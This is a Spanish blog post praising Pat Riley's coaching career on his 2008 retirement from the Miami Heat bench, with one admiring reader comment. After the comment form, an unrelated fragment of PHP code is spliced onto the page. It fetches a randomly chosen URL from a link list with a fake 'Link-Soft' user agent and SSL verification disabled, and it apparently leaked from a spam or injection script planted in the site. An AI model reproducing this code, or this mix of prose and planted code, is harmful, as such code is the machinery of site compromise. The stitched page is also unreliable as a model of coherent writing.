Algo se muere en el alma…

29 de April de 2008 por Gallis

En este caso, la famosa sevillana (sic) se podría completar con aquello de…cuando Pat Riley se va. No sabemos si esta vez será la definitiva, pero si sabemos que las bandas de la NBA no serán lo mismo sin sus trajes de Armani y su pelo engominado. Pero como él mismo demostró en 2005, es difícil pensar que su retiro sea definitivo. Casi 40 años de dedicación casi adictiva al baloncesto no se olvidan así como así. Riley se centrará a partir de ahora en el trabajo de despachos (conserva su puesto de presidente del equipo), un trabajo que ya ha demostrado que no se le da nada mal. Y si vuelve a construir un equipo aspirante al anillo, quién sabe si Riley no querrá quitarse del paladar el regusto amargo que deja su retirada.

Y es que la grandeza de Riley es indiscutible, pero el momento elegido para marcharse no parece el mejor de su carrera. Pese a su más que merecido ingreso en el Hall of Fame, tanto Miami como él han firmado su peor temporada, con tan sólo 15 victorias. Pero si mala es la cifra, peor es la imagen. La franquicia se llegó a convertir en un equipo más propio de la D-League, mientras Riley desertaba de los banquillos, en busca de joyas que seleccionar en el draft. Así las cosas, parece una decisión acertada que la afición de Miami vea el año que viene una cara nueva en el banquillo. La de su hasta ahora asistente Erik Spoelstra. Eso sí, si la retirada es definitiva, este final no será más que un rumor entre los aplausos más que merecidos que adornan su trayectoria.

Riley ganó el primero de sus 7 anillos en 1972, ya que formaba parte de aquellos míticos Lakers. Sin embargo, Riley era un jugador de esos llamados de la intendencia, así que aprovechó sus largas estancias en el banquillo para asimilar todo lo posible de sus compañeros y entrenadores. Fue en aquel entonces cuando decidió que el baloncesto no iba a ser una parte de su vida. Era su vida. Sin salir del banquillo amarillo, Riley disfrutó en 1980 de la exhibición de Magic en Philadelphia y se hizo con su segundo anillo, esta vez como asistente de Paul Westhead. La pelea entre su jefe y la megaestrella angelina le situó al mando de las operaciones y el resultado fue excepcional: 4 anillos, incluyendo la primera victoria de los Lakers a los Celtics en una gran final y el primer back to back de un equipo NBA en 18 años, amén del nacimiento del Showtime. Neoyorquino de nacimiento, su hogar fue el destino elegido cuando tuvo que abandonar su Los Angeles adoptivo. Allí no llegó a conseguir su objetivo, pese a quedarse a las puertas en 1994. Y en lo que algunos interpretaron en su momento como una jubilación dorada, Riley volvió a hacer las maletas un año después rumbo a Miami. Allí llegó con la misma filosofia que tan buenos resultados ha dado a los Lakers: La ruta del 5. El primer intento, Alonzo Mourning, no terminó de funcionar, pero cuando en el verano de 2004 los Lakers, sus Lakers, de Shaq, Kobe y Phil Jackson se desintegraron, él se lanzo a por Shaq y puso la guinda a su equipo, el equipo que llevaba 12 años moldeando. Nunca antes un entrenador había ganado 2 anillos con 18 años de diferencia, pero es que estas estadísticas nunca estuvieron hechas para Riley.

Y es que si algo ha dominado Riley tan bien como los banquillos, es eso que en algunos clubes se dá por llamar el entorno. Cuando se convirtió en entrenador de los Lakers, comprendió que Hollywood significa glamour. Se engominó el pelo y renovó su vestuario con las mejores marcas, convirtiéndose en un símbolo tan potente de aquellos Lakers como los propios Magic, Kareem y Worthy. Además, cuando ningún equipo se atrevía a ganar 2 anillos seguidos, él lo garantizó en 1987. Un año después no se atrevió a garantizar el three-peat, pero en cambio, se quedó con los derechos de esta expresión, consciente de que tarde o temprano algún equipo (quienes sino sus Lakers) lo conseguiría. En 2002 no ganó el anillo, pero su cuenta corriente y su amor por los Lakers crecieron sobremanera. Y cuando el 20 de junio de 2006 los Heat viajaban a Dallas, con un partido de ventaja pero dos encuentros por jugar en Dallas, afirmó que en su maleta solo llevaba una camisa, un traje, una corbata y mucho espacio para guardar el trofeo.

Palabra de Riley. Quienés le admiramos esperamos volver a oírla, al menos, una última vez.  

Comenta

Un comentario a esta entrada

  1. MagicJohnson32 dice:
    #1

    Un absoluto, total, grandísimo ganador. Todos los entrenadores tendrían que aprender de Riley, que ha hecho competitivos aquellos equipos por los que ha pasado, con estilos de juego siempre adaptados a las cualidades de la materia prima (los jugadores) con los que contaba. Él ‘sólo’ imponía su espíritu ganador y no coartaba el talento de sus jugadores, cosa tan frecuente entre los que ocupan los banquillos.

    Siempre me maravillo eso, su capacidad de adaptación.

    Cuando Phil decida retirarse, ¡¡que vuelva Riley!!

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>